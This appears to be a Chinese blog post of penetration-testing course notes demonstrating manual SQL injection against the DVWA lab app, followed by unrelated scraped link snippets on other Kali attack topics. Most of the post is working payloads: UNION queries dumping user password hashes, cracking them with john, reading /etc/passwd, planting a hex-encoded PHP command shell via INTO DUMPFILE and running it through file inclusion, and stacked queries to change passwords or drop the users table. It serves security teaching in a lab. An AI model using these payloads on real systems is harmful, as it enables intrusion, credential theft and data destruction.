Kali Linux渗透测试 089 手动漏洞挖掘-SQL注入漏洞

本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程，教程为安全牛课堂里的《Kali Linux 渗透测试》课程

Kali Linux渗透测试（苑房弘）博客记录

1. SQL注入
2. 测试 dvwa Low 安全级别拥有MySQL的root权限
    2-1. 基于报错的检测方法
    2-2. 基于布尔的检测方法
    2-3. 查询字段数
    2-4. 联合查询
    2-5. 可以使用的函数
    2-6. 使用 HackBar
    2-7. 综合查询
    2-8. 使用 BurpSuite
    2-9. 文件操作
3. 测试 dvwa Low 安全级别无 MySQL 的 root 权限
4. 测试 dvwa Low 安全级别当数据库可写
5. 测试 dvwa Medium or High 安全级别
    5-1. 服务器源代码
    5-2. Medium 安全级别下的漏洞分析
    5-3. High 安全级别下的漏洞分析

1. SQL注入

基于报错的检测方法（low）
- ’ ” % ()
基于布尔的检测
- 1’ and ‘1’=‘1 / 1’ and ‘1
- 1’ and ‘1’=‘2 / 1’ and ‘0
表列数 / 显示信息位于哪一列
- ‘ order by 9–+ #按查询列好排序（注释：– ）
- select * 时表字段数=查询字段数
联合查询
- ’ union select 1,2–+
- ’ union all select database(),2–+

2. 测试 dvwa Low 安全级别（拥有MySQL的root权限）

1. 基于报错的检测方法

正常的SQL查询过程

在预置的”中进行插入语句，进行查询

select First name,Surname from users where id = ' <待输入的查询信息> '

使用单引号 ’ 进行测试

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

测试结果：输入的单引号 ’ 被服务器接收，导致出现五个单引号 ’ ，说明存在注入漏洞

2. 基于布尔的检测方法

正常的SQL查询过程

在预置的”中进行插入语句，进行查询

select First name,Surname from users where id = ' <待输入的查询语句> '

测试漏洞是否存在

插入 1

select First name,Surname from users where id = ' 1 '

插入 1’ and ‘1’ = ‘1

select First name,Surname from users where id = ' 1' and '1' = '1 '

插入 1’ and ‘1

select First name,Surname from users where id = ' 1' and '1 '

3. 查询字段数

正常的SQL查询过程

在预置的”中进行插入语句，进行查询

select First name,Surname from users where id = ' <待输入的查询语句> '

测试字段数是否存在

插入 ’ order by 50–

select First name,Surname from users where id = ' ' order by 50--  '

插入 ’ order by 3–

select First name,Surname from users where id = ' ' order by 3--  '

插入 ’ order by 2–
```
select First name,Surname from users where id = ' ' order by 2--  '
```
无结果，表示存在此字段数，吴3字段，说明只到2

4. 联合查询

正常的SQL查询过程

在预置的”中进行插入语句，进行查询

select First name,Surname from users where id = ' <待输入的查询语句> '

测试字段数

插入 ’ union select 1,2–

select First name,Surname from users where id = ' ' union select 1,2--  '

插入 1’ union select user(),2–

select First name,Surname from users where id = ' 1' union select user(),2--  '

插入 ’ union select user(),2–

select First name,Surname from users where id = ' ' union select user(),2--  '

插入 ’ union select user(),version()–

select First name,Surname from users where id = ' ' union select user(),version()--  '

5. 可以使用的函数

正常的SQL查询过程

在预置的”中进行插入语句，进行查询

select First name,Surname from users where id = ' <待输入的查询语句> '

多函数查询
- 插入 ’ union select database(),substring_index(USER(),”@”,1)–
```
select First name,Surname from users where id = ' ' union select database(),substring_index(USER(),"@",1)--  '
```
- DB用户：user()
- DB版本：version()
- 全局函数：@@datadir、@@hostname、@@VERSION、@@version_compile_os
  
  插入 ’ union select user(),@@datadir–
```
select First name,Surname from users where id = ' ' union select user(),@@datadir--  '
```
  插入 ’ union select @@hostname,@@VERSION–
  select First name,Surname from users where id = ’ ’ union select @@hostname,@@VERSION– ’
- 当前库：database()
- ASCII 转字符：char()
- 连接字符串：CONCAT_WS(CHAR(32,58,32),user(),database(),version())
```
select First name,Surname from users where id = ' ' union select CONCAT_WS(CHAR(32,58,32),user(),database(),version()),null--  '
```
- 计算哈希：md5()
```
select First name,Surname from users where id = ' ' union select CONCAT_WS(CHAR(32,58,32),user(),database(),version()),md5('AAA')-- '
```

6. 使用 HackBar

用法
- “+” 和 “空格” 等价
- Split URL：会自动将 URL 分段

substring_index() 的用法

不使用 substring_index() 时
```
' union select database(), USER()-- 
```

使用 substring_index() 时

' union select database(),substring_index(USER(),"@",1)--

7. 综合查询

查询所有库所有表

' union select table_name,table_schema from information_schema.tables--+

统计每库中表的数量

' UNION select table_schema,count(*) FROM information_Schema.tables group by table_schema --

DVWA 中的表名

' union select table_name,table_schema from information_schema.tables where table_schema='dvwa'--+

user 表中的所有列（user_id?first_name?last_name?user?password?avatar）

' union select table_name,column_name from information_schema.columns where table_schema='dvwa' and table_name='users'--+

查询 user、password列的内容

' union select user,password from dvwa.users--+

' union select user,password from users--+

' union select null, concat(user,0x3a,password) from users--+

将测试拿到的密码进行进行猜解

获取密码类型

比如：5f4dcc3b5aa765d61d8327deb882cf99

猜测是 MD5 值

制作待破译密码列表

admin:5f4dcc3b5aa765d61d8327deb882cf99
gordonb:e99a18c428cb38d5f260853678922e03
1337:8d3533d75ae2c3966d7e0d4fcc69216b
pablo:0d107d09f5bbe40cade3de5c71e9e9b7
smithy:5f4dcc3b5aa765d61d8327deb882cf99

root@kali:~/Desktop# john --format=raw-MD5 test.txt

# 缓存问题：
root@kali:~/.john# ls
john.log  john.pot

8. 使用 BurpSuite

开启截断代理
将截断的请求 repeater

9. 文件操作

读取文件

' union SELECT null, load_file('/etc/passwd')--+

写入文件

' union select null,"" INTO DUMPFILE 'a.php'--

结合 sql 注入文件漏洞和文件包含漏洞

# 查看可知文件被写入 /var/lib/mysql/dvwa 路径
root@metasploitable:/var/lib/mysql/dvwa# cat a.php 


# 但是如此写入的文件并不可以读取，因为权限是 mysql，其他用户（www-data）不可读
root@metasploitable:/var/lib/mysql# ll -d dvwa/
drwx------ 2 mysql mysql 4096 Mar 22 11:08 dvwa/

# 可以将文件写入 /tmp 目录
root@metasploitable:~# ll -d /tmp
drwxrwxrwt 6 root root 4096 Mar 22 09:57 /tmp

# 写入文件
'%20union%20select%20null,""%20INTO%20DUMPFILE%20'/tmp/a.php'--%20

# 分析以上可知，文件被写入 /tmp/a.php
root@metasploitable:/tmp# cat a.php 

# 使用文件包含漏洞
http://10.10.10.132/dvwa/vulnerabilities/fi/?page=/tmp/a.php&cmd=id

绕过 URL 过滤机制进行文件上传（十六进制编码）

root@kali:~/Desktop# cat test.php 


#进行十六进制编码
root@kali:~/Desktop# cat test.php | xxd -ps | tr -d '\n'
        3c3f706870206563686f207368656c6c5f6578656328245f4745545b27636d64275d293b3f3e0a

#将此输出数据放在文档中保存
root@kali:~/Desktop# cat php-reverse-shell.php | xxd -ps | tr -d '\n' > phpr.txt

# 在 BurpSuite 中进行粘贴替换原来的 ""
# 前面加上 (0x)

#发现 a.php 已经存在
#改为 c.php

# 进行测试（十六进制编码的代码被服务器还原为正常代码）
root@metasploitable:~# cat /tmp/c.php 


http://10.10.10.132/dvwa/vulnerabilities/fi/?page=/tmp/c.php&cmd=id

保存下载数据库（结合文件上传漏洞）

' union select user,password from users --+

' union select null, concat(user,0x3a,password) from users INTO OUTFILE '/tmp/a.db'--+

# 如果该网站不存在文件上传漏洞，只能使用在网页复制粘贴的方法（分批次列出数据库内容），写入的文件也无法进行访问。

在无法破解账号密码之后，可以编写插入服务器代码来增加账号密码.

' union select null,'"; echo"first_name: $first_name
"; echo "last_name: $last_name
"; echo "username:$username
"; echo "avatar: $avatar
";$con=mysqli_connect("127.0.0.1","root","","dvwa"); if (mysqli_connect_errno()) { echo"Failed to connect to MySQL: " . mysqli_connect_error(); } else { echo "Connected todatabase
"; } $password = "123"; $sql="insert into dvwa.users values (\\"$userID\\",\\"$first_name\\",\\"$last_name\\",\\"$username\\",MD5(\\"$password\\"),\\"$avatar\\")"; if (mysqli_query($con,$sql)) { echo "[Successful Insertion]: $sql"; } else { echo "Errorcreating database: " . mysqli_error($con); } mysqli_close($con); } ?> "> 
 
 
 

 
 ' INTO DUMPFILE '/tmp/user.php' --+

# 使用 HackBar

# 查询验证
# 结果：插入的代码太长，内容有错误，导致未成功插入。本人不会修改，以后再说。。。。

3. 测试 dvwa Low 安全级别（无 MySQL 的 root 权限）

猜列名：’ and column is null–+

select * from table_name where uid='   <注入查询语句>   '
select * from table_name where uid='  ' and column is null--+   '

' and admin is null--

# 可以使用字典进行猜解
root@kali:~# find / -name *column*.txt
/usr/local/src/w3af/w3af/plugins/attack/db/sqlmap/txt/common-columns.txt
/usr/share/golismero/tools/sqlmap/txt/common-columns.txt
/usr/share/qgis/python/plugins/processing/algs/grass/description/v.buffer.column.txt
/usr/share/qgis/python/plugins/processing/algs/grass7/description/v.buffer.column.txt
/usr/share/sqlmap/txt/common-columns.txt

# 在sql查询是，井号（#）有特殊含义，代表临时查询，可以删掉
root@kali:~# cat /usr/share/sqlmap/txt/common-columns.txt | grep -v ^# > column.txt

# 使用 BurpSuite

猜当前表表名：’ and table.user is null–+

root@kali:~# find / -name *table*.txt
root@kali:~# cp /usr/share/golismero/tools/sqlmap/txt/common-tables.txt .
root@kali:~# cat common-tables.txt | grep -v ^# > table.txt

使用 ’ and db.table.aa is null–

猜库里其他表：’ and (select count(*) from table)>0–+
```
' and (select count(*) from a)>0--+
```
列表对应关系：’ and table.user is null–+
猜字段内容：’ or user=’admin、’ or user like ’ %a%
```
' or user='admin
```
```
' or user like '%a% 
# %是通配符
```
猜账号对应密码：’ or user=’admin’ and password=’5f4dcc3b5aa765d61d8327deb882cf99
```
' or user='admin' and password='5f4dcc3b5aa765d61d8327deb882cf99
```

4. 测试 dvwa Low 安全级别：当数据库可写

修改管理员账号 ‘; update users set user=’yuanfh’ where user=’admim；

无法成功执行是因为客户端问题
客户端不支持两条指令一起查询，但是在 MySQL 命令行下是支持的
修改管理员密码 ‘; update users set password=’5f4dcc3b5aa765d61d8327deb882cf99’ where user=’admim；

无法成功执行是因为客户端问题
客户端不支持两条指令一起查询，但是在 MySQL 命令行下是支持的
插入一个用户 ‘; INSERT INTO users (‘user_id’,’first_name’,’last_name’,’user’,’password’,’avatar’) VALUES (‘35’,’fh’,’yuan’,’yfh’,’5f4dcc3b5aa765d61d8327deb882cf99’,’OK’);–+
删除一个表 ‘; DROP TABLE users; –+
xp_cmdshell / 存储过程

2. 测试 dvwa Medium or High 安全级别

1. 服务器源代码

Low 安全级别源代码

2. Medium 安全级别下的漏洞分析

源代码中的 id=mysqlrealescapestring( id);
- mysql_real_escape_string() 函数是对字符进行转义，转义的字符包括
- \x00
- \n
- \r
- \
- ‘
- “
- \x1a
- mysql_real_escape_string() 函数在 PHP5 > PHP版本 >= 4.3.0 存在
- PHP 5.5.0 已经放弃使用此函数，PHP7已经删除此函数，代之以 MySQLi、PDO_MySQL

经过分析源码，发现只是过滤了单引号，因此不需要对单引号进行闭合

http://10.10.10.132/dvwa/vulnerabilities/sqli/?id=0&Submit=Submit

0 union select user(),null

http://10.10.10.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit

1 union select user(),null

3. High 安全级别下的漏洞分析

mysql_real_escape_string()
stripslashes()：去除 ‘\’
is_numeric()：判断是否是数字,是数字直接退出

你可能感兴趣的:(kali-linux)

ARP欺骗（断网测试） Passion-优网络安全网络攻击模型测试工具
一.测试实验环境1.软件：VMwareWorkstations14以上版本2.虚拟机：Kali-Linux、Windows71)打开虚拟机：启动kali-linux启动windows7（未装补丁）2)获取IP地址（ifconfig、ipconfig）Kali-Linux：192.168.164.129Windows7：192.168.164.138二.实验步骤具体攻击实现具体的中间人攻击，大体上可
❖ Kali-linux 初识 Solomon_Xie
基本我发现Kali-linux其实不用安装，直接在光盘里运行也能很好的完成几乎所有需要的任务。Kali默认账户就直接是root，默认密码是toor，反过来罢了。Kali默认SSH都开启的，只是端口没开启。所以想从别的地方ssh进来，需要改一下sshd的配置/etc/ssh/ssd_config，只需把端口22那一行取消注释即可。Kali主要就方便在默认就安装好了一系列常用的程序，相当于一个“精装修
Kali-Linux 使用evillimiter，采用arp欺骗，限制上网速度坦笑&&life 网络安全 linux 运维服务器
Kali-Linux使用evillimiter，采用arp欺骗，限制上网速度1.首先下载evillimiter工具///从github上下载此工具gitclonehttps://github.com/bitbrute/evillimiter.git2.使用cd命令进入此工具目录cdevillimiter3.使用Python3安装此工具（安装方法可自行百度）sudopython3setup.pyin
Kali-linux + VMware安装 came_861 linux 服务器
目录一、kali镜像下载二、安装过程：一、kali镜像下载下载地址：https://mirrors.tuna.tsinghua.edu.cn/kali-images/kali-2022.4/二、安装过程：打开vmware,创建新的虚拟机选择“自定义（高级）”：选择已经下载好的镜像文件的路径（也可以选择稍后安装）选择如图设置命名虚拟机的名称、选择该虚拟机安装位置按照图中设置这里可根据个人电脑设备情况
kali-Linux安装ARL灯塔教程以及timeout of 20000ms exceeded 的解决方法是liku不是里库 WEB安全 linux 运维服务器
FLAG：别和妈妈诉苦，她帮不上，也睡不着。专研方向:docker，ARL资产灯塔系统每日emo：天冷了，你还在坚持吗？欢迎各位与我这个菜鸟交流学习kali安装ARL灯塔教程1.安装docker环境，有了就跳过aptinstalldocker.io2.确保安装成功，查看docker版本dockerversion出现即算成功安装3.docker安装成功后重启即可reboot4.安装arl灯塔，两种方
渗透测试实战之ARP欺骗攻击（ARP断网攻击）爱玩游戏的黑客网络基础网络网络安全 linux 服务器
一、实训目的：通过实训理解ARP欺骗的原理掌握中间攻击的方法。二、场景描述：在虚拟机环境下配置“Win7”和“KaliLinux”虚拟系统，使得2个系统之间能够相互通信，网络拓扑如图所示。三、实验环境：1.软件：VMwareWorkstations14以上版本2.虚拟机：Kali-Linux、Windows71)打开虚拟机：启动kali-linux启动windows7（未装补丁）2)获取IP地址（
如何在Kali-Linux中进行cc攻击 Albart575 linux ddos
cc攻击原理：CC攻击的原理就是攻击者控制某些主机不停地发大量数据包给对方服务器造成服务器资源耗尽，一直到宕机崩溃。CC主要是用来消耗服务器资源的，每个人都有这样的体验：当一个网页访问的人数特别多的时候，打开网页就慢了，CC就是模拟多个用户(多少线程就是多少用户)不停地进行访问那些需要大量数据操作(就是需要大量CPU时间)的页面，造成服务器资源的浪费，CPU长时间处于100%，永远都有处理不完的连
Kali-linux新手教程，分辨率推荐，中文配置，中文输入法，VScode配置，root配置半只野指针 linux vscode 运维网络安全
Kali-linux新手教程（基于vm和22.04版本kali）1.VM分辨率问题vm的kali的字体是比较小的，根据经验；建议开1280*720，并且勾选自由拉伸2.解决初始化使用root问题在初始化界面按e进入初始化高级菜单（这里实际上是修改boot目录下某些文件达到目的）注意到在GRUB界面下的红框部分roquietsplash修改为rwquietsplashinit=/bin/bash使用
如何在Hyper-V中安装Kali-Linux系统 Albart575 linux 运维服务器
一、下载kali镜像在官网下载GetKali|KaliLinux下载这个二、创建Hyper-V虚拟机在搜索框搜索启用和关闭Windows功能之后打开选择下面这几个功能这是windows专业版的功能，家庭版没有，想要获取请参考Win10家庭中文版安装Hyper-V-知乎(zhihu.com)安装好后重启电脑，在搜索框中搜索Hyper-V，打开,在管理器的界面，选择右边的“新建”点虚拟机之后点击下一步
Kali-Linux常用命令狙个栗子 linux 服务器运维
Kali-Linux常用命令一.lsls/dev-l#以一种长列表格式展示路径下的文件drwxr-xr-xd表示文件属性为一个目录，后面字符三个一组，分别表示文件所有者，文件所属组，其他用户对该文件所拥有的权限（r-读(权重4)，w-写(权重2)，x-执行(权重1)）ls/dev-alh--sort=size长列表展示/dev目录下的所有文件，直观展示文件大小并按照文件大小进行排序a即all,所有
适用于 Linux 的 Windows 子系统（WSL） BinaryMoon Windows UNIX Like Tool linux windows 运维
适用于Linux的Windows子系统（WSL）描述什么是“适用于Linux的Windows子系统”系统要求Windows10。Windows11。查看计算机系统的版本虚拟化功能启用虚拟化功能禁用虚拟化功能检测是否开启虚拟化功能使用WSL运行Linux的各类发行版查看可供安装的Linux各类发行版安装KaliLinuxRolling安装相关的软件开启Hyper-V功能安装kali-linux发行版
安鸾渗透实战平台——SSH离线破解 (250分) 阿文、... 安鸾渗透实战平台 ssh 安全 linux
漏洞环境安鸾渗透实战平台kali（john）：linux密码攻击工具；详情了解请转到这位师傅的博客：https://www.fujieace.com/kali-linux/courses/john.html题目打开压缩包会得到两个文件字典文件shadow：1、Linux操作系统下有一个文件负责所有用户的密码。那就是shadow；2、/etc/shadow文件中的记录行与/etc/passwd中的一
Kali-linux：nmap命令胖哥王老师 linux知识 nmap kali linux kali 漏洞扫描
概念Nmap用于在远程机器上探测网络，执行安全扫描，网络审计和搜寻开放端口。它会扫描远程在线主机，该主机的操作系统，包过滤器和开放的端口。使用场景掌握了具体使用场景，主要就是掌握如下参数使用：以192.168.31.18为目标靶机1.普通扫描root@sunjin:/home/sunjin#nmap192.168.31.18StartingNmap7.80(https://nmap.org)at2
VMware虚拟机安装Kali-Linux qmkn Linux
安装Kali-Linux:史上最详细的VM虚拟机安装Kali-linux教程(以2020.1版本为例，含下载地址+默认提升为root权限)2021.1安装kaliLinux最新版本虚拟机两个链接都可以安装VM虚拟机：VM
Kali Linux渗透测试技术详解_渗透测试入门哈喽沃德er linux 系统安全网络
知识点1.KaliLinux是做渗透测试用的2.安装VMwareWorkstation虚拟机3.安装kali-linux系统4.基本用法-重新设置root密码5安装debian11系统-默认命令行模式登录1.KaliLinux是做渗透测试用的渗透测试是通过模拟恶意黑客的攻击方法，来评估计算机网络系统安全的一种评估方法，这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析。渗透测试与其他评估方法不
Windows10 WSL安装kali-linux ghostliner linux windows
Windows10WSL安装kali-linuxWindows10安装WSL参考：安装WSL|MicrosoftLearn前言适用于Linux的Windows子系统(WSL)可让开发人员直接在Windows上按原样运行GNU/Linux环境（包括大多数命令行工具、实用工具和应用程序），且不会产生传统虚拟机或双启动设置开销。系统需求必须运行Windows10版本2004及更高版本（内部版本19041
nmap参数孤君蓑笠翁
0x00nmap使用背景Nmap是一个网络连接端扫描软件，用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端，并且推断计算机运行哪个操作系统。它是网络管理员必用的软件之一，以及用以评估网络系统安全。网上有不少介绍nmap使用的方法，但是本文主要介绍在实践中，很有成效并且经常会用到的命令。0x01nmap使用方法#以下的实践方案均是基于KALI-LINUX进行的，但是只要在安装有nmap
穷举爆破神器hydra详细讲解和利用 maverickpig 渗透测试自学日志之基础原理篇安全 web安全
渗透测试自学笔记，想把自己所学的完整记录下来关于Hydrahydra是一个支持众多协议的爆破工具，已经集成到Kali-Linux中，直接在终端打开即可，同时也有Windows版（链接）Windows版Kali版你可以在Github上找到它的源码：https://github.com/vanhauser-thc/thc-hydraHydra使用hydra有两个版本命令行版本GUI版本其中GUI版本叫
Kali-linux查看打开的端口网络安全百宝库（一） linux 网络服务器 web安全网络安全
对一个大范围的网络或活跃的主机进行渗透测试，必须要了解这些主机上所打开的端口号。在KaliLinux中默认提供了Nmap和Zenmap两个扫描端口工具。为了访问目标系统中打开的TCP和UDP端口，本节将介绍Nmap和Zenmap工具的使用。4.4.1TCP端口扫描工具Nmap使用Nmap工具查看目标主机192.168.41.136上开放的端口号。执行命令如下所示：root@kali:~#nmap1
sqlmap的安装与使用乔治777 sql web安全
文章目录sqlmap的安装sqlmap的使用Windows下的sqlmap：get方式注入post方式注入kali-linux下的sqlmap（待更新）sqlmap的安装准备工作：（1）python2.7.18（只能安装2.6--3.0版本）下载地址：https://www.python.org/downloads/安装时：直接next将“Addpython.exetoPath”项勾选，勾选后安装
Kali-linux攻击路由器网络安全百宝库（一） linux 智能路由器网络网络安全 Kali
前面介绍的各种工具，都是通过直接破解密码，来连接到无线网络。由于在一个无线网络环境的所有设备中，路由器是最重要的设备之一。通常用户为了保护路由器的安全，通常会设置一个比较复杂的密码。甚至一些用户可能会使用路由器的默认用户名和密码。但是，路由器本身就存在一些漏洞。如果用户觉得对复杂的密码着手可能不太容易。这时候，就可以利用路由器自身存在的漏洞实施攻击。本节将介绍使用Routerpwn工具实施攻击路由
Kali-linux密码在线破解网络安全百宝库（一） linux 网络安全网络安全 Kali
为了使用户能成功登录到目标系统，所以需要获取一个正确的密码。在Kali中，在线破解密码的工具很多，其中最常用的两款分别是Hydra和Medusa。本节将介绍使用Hydra和Medusa工具实现密码在线破解。8.1.1Hydra工具Hydra是一个相当强大的暴力密码破解工具。该工具支持几乎所有协议的在线密码破解，如FTP、HTTP、HTTPS、MySQL、MSSQL、Oracle、Cisco、IMA
Kali-linux无线网络嗅探工具Kismet 网络安全百宝库（一） linux 服务器网络 Kali 网络安全
如果要进行无线网络渗透测试，则必须先扫描所有有效的无线接入点。刚好在KaliLinux中，提供了一款嗅探无线网络工具Kismet。使用该工具可以测量周围的无线信号，并查看所有可用的无线接入点。本节将介绍使用Kismet工具嗅探无线网络。（1）启动Kismet工具。执行命令如下所示：root@kali:~#kismet执行以上命令后，将显示如图9.1所示的界面。图9.1终端延伸（2）该界面用来设置是
虚拟机-安装与使用2023 逸佳6 linux 运维服务器
虚拟机-安装与使用前言一、虚拟机1.VMware2.Virtualbox二、VMware的下载三、VMware的安装四、验证是否安装成功五、运行VMware六、VMware上安装其它操作系统安装Windows10安装CentOS-Linux安装Kali-Linux七、VMware常用功能同步时间系统备份克隆快照内存设置八、安装过程时遇到的问题九、总结前言最近学习elasticsearch，但是es
VMware安装 kali-linux出现的报错：未能启动虚拟机 Kasusa linux 运维服务器
VMware安装kali-linux出现的报错：未能启动虚拟机右键-兼容性，改成vm16.发生错误，导致虚拟CPU进入关闭状态找到.vmx文件，搜索并修改成：virtualHW.version="16"
VMware 之安装 kali-linux 操作步骤何文礼
1.安装linux版的VMware-tools1.1找到VMwareworkstations的安装目录下的linux.isolinux.iso导入镜像文件linux.isolinux。iso1.2进行光盘挂载，挂载命令：root@kali:/#mount/dev/sr0/mnt未连接光驱查看光盘内容并解压VMwareTools-10.3.10-13959562.tar.gz压缩包，进入目录进行安装
口令暴力破解--Ftp协议暴力破解与Ssh协议暴力破解知不足，而学习杂文服务器网络 linux
Ftp协议暴力破解FTP服务检测FTP服务FTP是一种文件传输协议，FTP服务默认端口为21。利用FTP服务器可以在本地主机和远程主机间进行文件传输。当FTP没有配置好安全控制，如对登录的源地址及密码尝试次数做限制，那么就会存在暴力破解可能。本次靶机服务器地址：193.168.1.23Nmap扫描打开kali-linux虚拟机，利用kali-linux自带的nmap扫描：nmap–v–A–Pn19
由于未安装所需的特性,无法启动操作 Jacky1008611 wsl linux 其他 windows
由于未安装所需的特性,无法启动操作win10的wsl升级成wsl2时需要在windowsTerminal中输入wsl--set-versionUbuntu2,来把安装好的Ubuntu升级成wsl2版本。但是报错：由于未安装所需的特性,无法启动操作。而翻遍百度也没有解决方案。同时，下载其他的Linux版本，比如：Kali-linux。启动时，会报：WSL2InstallingLinuxfailed,
树莓派 kali 安装raspi-config 欧阳睿树莓派 raspberry pi
文章目录下载raspi-config安装包执行安装命令树莓派官方系统预装有raspi-config，但是比如Ubuntu、kali系统并没有安装。以此文简单记录kali-linux安装raspi-config的过程。下载raspi-config安装包前往官网下载最新版安装包下载地址：http://archive.raspberrypi.org/debian/pool/main/r/rasp
虚拟机-安装与使用（详细教程）多加点辣也没关系安装教程 linux 运维 java
虚拟机-安装与使用前言一、虚拟机1.VMware2.Virtualbox二、VMware的下载三、VMware的安装四、验证是否安装成功五、运行VMware六、VMware上安装其它操作系统1.安装Windows102.安装CentOS-Linux3.安装Kali-Linux七、VMware常用功能1.同步时间2.系统备份1.克隆2.快照3.内存设置八、安装过程时遇到的问题九、总结前言最近学习el
Spring4.1新特性——Spring MVC增强 jinnianshilongnian spring 4.1
目录 Spring4.1新特性——综述 Spring4.1新特性——Spring核心部分及其他 Spring4.1新特性——Spring缓存框架增强 Spring4.1新特性——异步调用和事件机制的异常处理 Spring4.1新特性——数据库集成测试脚本初始化 Spring4.1新特性——Spring MVC增强 Spring4.1新特性——页面自动化测试框架Spring MVC T
mysql 性能查询优化 annan211 java sql 优化 mysql 应用服务器
1 时间到底花在哪了？ mysql在执行查询的时候需要执行一系列的子任务，这些子任务包含了整个查询周期最重要的阶段，这其中包含了大量为了检索数据列到存储引擎的调用以及调用后的数据处理，包括排序、分组等。在完成这些任务的时候，查询需要在不同的地方花费时间，包括网络、cpu计算、生成统计信息和执行计划、锁等待等。尤其是向底层存储引擎检索数据的调用操作。这些调用需要在内存操
windows系统配置 cherishLC windows
删除Hiberfil.sys ：使用命令powercfg -h off 关闭休眠功能即可： http://jingyan.baidu.com/article/f3ad7d0fc0992e09c2345b51.html 类似的还有pagefile.sys msconfig 配置启动项 shutdown 定时关机 ipconfig 查看网络配置 ipconfig /flushdns
人体的排毒时间 Array_06 工作
======================== || 人体的排毒时间是什么时候？|| ======================== 转载于： http://zhidao.baidu.com/link?url=ibaGlicVslAQhVdWWVevU4TMjhiKaNBWCpZ1NS6igCQ78EkNJZFsEjCjl3T5EdXU9SaPg04bh8MbY1bR
ZooKeeper cugfy zookeeper
Zookeeper是一个高性能，分布式的，开源分布式应用协调服务。它提供了简单原始的功能，分布式应用可以基于它实现更高级的服务，比如同步，配置管理，集群管理，名空间。它被设计为易于编程，使用文件系统目录树作为数据模型。服务端跑在java上，提供java和C的客户端API。 Zookeeper是Google的Chubby一个开源的实现，是高有效和可靠的协同工作系统，Zookeeper能够用来lea
网络爬虫的乱码处理随意而生爬虫网络
下边简单总结下关于网络爬虫的乱码处理。注意，这里不仅是中文乱码，还包括一些如日文、韩文、俄文、藏文之类的乱码处理，因为他们的解决方式是一致的，故在此统一说明。网络爬虫，有两种选择，一是选择nutch、hetriex，二是自写爬虫，两者在处理乱码时，原理是一致的，但前者处理乱码时，要看懂源码后进行修改才可以，所以要废劲一些；而后者更自由方便，可以在编码处理
Xcode常用快捷键张亚雄 xcode
一、总结的常用命令：隐藏xcode command+h 退出xcode command+q 关闭窗口 command+w 关闭所有窗口 command+option+w 关闭当前
mongoDB索引操作 adminjun mongodb 索引
一、索引基础： MongoDB的索引几乎与传统的关系型数据库一模一样，这其中也包括一些基本的优化技巧。下面是创建索引的命令： > db.test.ensureIndex({"username":1}) 可以通过下面的名称查看索引是否已经成功建立： &nbs
成都软件园实习那些话 aijuans 成都软件园实习
无聊之中，翻了一下日志，发现上一篇经历是很久以前的事了，悔过~~ 　　断断续续离开了学校快一年了，习惯了那里一天天的幼稚、成长的环境，到这里有点与世隔绝的感觉。不过还好，那是刚到这里时的想法，现在感觉在这挺好，不管怎么样，最要感谢的还是老师能给这么好的一次催化成长的机会，在这里确实看到了好多好多能想到或想不到的东西。　　都说在外面和学校相比最明显的差距就是与人相处比较困难，因为在外面每个人都
Linux下FTP服务器安装及配置 ayaoxinchao linux FTP服务器 vsftp
检测是否安装了FTP [root@localhost ~]# rpm -q vsftpd 如果未安装：package vsftpd is not installed 安装了则显示：vsftpd-2.0.5-28.el5累死的版本信息安装FTP 运行yum install vsftpd命令，如[root@localhost ~]# yum install vsf
使用mongo-java-driver获取文档id和查找文档 BigBird2012 driver
注：本文所有代码都使用的mongo-java-driver实现。在MongoDB中，一个集合（collection）在概念上就类似我们SQL数据库中的表（Table），这个集合包含了一系列文档（document）。一个DBObject对象表示我们想添加到集合（collection）中的一个文档（document），MongoDB会自动为我们创建的每个文档添加一个id，这个id在
JSONObject以及json串 bijian1013 json JSONObject
一.JAR包简介要使程序可以运行必须引入JSON-lib包，JSON-lib包同时依赖于以下的JAR包： 1.commons-lang-2.0.jar 2.commons-beanutils-1.7.0.jar 3.commons-collections-3.1.jar &n
[Zookeeper学习笔记之三]Zookeeper实例创建和会话建立的异步特性 bit1129 zookeeper
为了说明问题，看个简单的代码， import org.apache.zookeeper.*; import java.io.IOException; import java.util.concurrent.CountDownLatch; import java.util.concurrent.ThreadLocal
【Scala十二】Scala核心六：Trait bit1129 scala
Traits are a fundamental unit of code reuse in Scala. A trait encapsulates method and field definitions, which can then be reused by mixing them into classes. Unlike class inheritance, in which each c
weblogic version 10.3破解 ronin47 weblogic
版本：WebLogic Server 10.3 说明：%DOMAIN_HOME%：指WebLogic Server 域(Domain）目录例如我的做测试的域的根目录 DOMAIN_HOME=D:/Weblogic/Middleware/user_projects/domains/base_domain 1.为了保证操作安全，备份%DOMAIN_HOME%/security/Defa
求第n个斐波那契数 BrokenDreams
今天看到群友发的一个问题：写一个小程序打印第n个斐波那契数。自己试了下，搞了好久。。。基础要加强了。 &nbs
读《研磨设计模式》-代码笔记-访问者模式-Visitor bylijinnan java 设计模式
声明：本文只为方便我个人查阅和理解，详细的分析以及源代码请移步原作者的博客http://chjavach.iteye.com/ import java.util.ArrayList; import java.util.List; interface IVisitor { //第二次分派，Visitor调用Element void visitConcret
MatConvNet的excise 3改为网络配置文件形式 cherishLC matlab
MatConvNet为vlFeat作者写的matlab下的卷积神经网络工具包，可以使用GPU。主页： http://www.vlfeat.org/matconvnet/ 教程： http://www.robots.ox.ac.uk/~vgg/practicals/cnn/index.html 注意：需要下载新版的MatConvNet替换掉教程中工具包中的matconvnet： http
ZK Timeout再讨论 chenchao051 zookeeper timeout hbase
http://crazyjvm.iteye.com/blog/1693757 文中提到相关超时问题，但是又出现了一个问题，我把min和max都设置成了180000，但是仍然出现了以下的异常信息： Client session timed out, have not heard from server in 154339ms for sessionid 0x13a3f7732340003
CASE WHEN 用法介绍 daizj sql group by case when
CASE WHEN 用法介绍 1. CASE WHEN 表达式有两种形式 --简单Case函数 CASE sex WHEN '1' THEN '男' WHEN '2' THEN '女' ELSE '其他' END --Case搜索函数 CASE WHEN sex = '1' THEN
PHP技巧汇总:提高PHP性能的53个技巧 dcj3sjt126com PHP
